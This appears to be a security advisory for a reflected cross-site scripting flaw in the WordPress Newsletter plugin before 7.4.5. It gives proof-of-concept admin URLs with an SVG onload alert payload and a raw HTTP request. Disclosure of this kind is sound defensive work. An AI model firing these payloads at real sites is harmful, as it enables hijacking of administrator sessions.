Newsletter < 7.4.5 - Reflected Cross-Site Scripting

2022-05-2300:00:00

PHYO WIN SHEIN

0.001 Low

EPSS

Percentile

38.0%

JSON

The plugin does not sanitize and escape the $_SERVER[‘REQUEST_URI’] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.

https://example.com/wp-admin/admin.php?page=newsletter_main_index&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_main_main&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_subscription_options&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_subscription_antibot&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_emails_index&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_users_index&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_main_extensions&debug&<svg/onload=alert(/XSS/)>

GET /wp-admin/admin.php?page=newsletter_main_index&debug&"><svg/onload=alert(/XSS/)> HTTP/1.1
Host: example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [logged in admin]
Upgrade-Insecure-Requests: 1

0.001 Low

EPSS

Percentile

38.0%

JSON

Related for WPEX-ID:6AD407FE-DB2B-41FB-834B-DD8C4F62B072